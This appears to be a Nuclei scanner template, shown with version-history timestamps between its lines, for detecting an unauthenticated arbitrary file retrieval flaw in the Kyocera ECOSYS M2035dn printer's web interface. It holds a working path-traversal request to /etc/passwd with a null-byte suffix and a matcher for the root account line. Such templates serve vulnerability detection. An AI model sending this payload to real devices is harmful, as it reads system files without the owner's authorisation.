2022-02-14 20:40:30 +00:00
|
|
|
id: kyocera-m2035dn-lfi
|
2022-02-14 08:58:07 +00:00
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: Kyocera Command Center RX ECOSYS M2035dn - Arbitrary File Retrieval
|
2022-02-14 08:58:07 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-05-13 20:26:43 +00:00
|
|
|
description: Kyocera Command Center RX ECOSYS M2035dn - Unauthenticated arbitrary file retrieval.
|
2022-02-14 08:58:07 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/50738
|
|
|
|
- https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
|
|
|
|
tags: printer,iot,kyocera,lfi
|
2022-02-14 20:40:30 +00:00
|
|
|
|
|
|
|
requests:
|
2022-02-14 08:58:07 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/js/../../../../../../../../etc/passwd%00.jpg"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|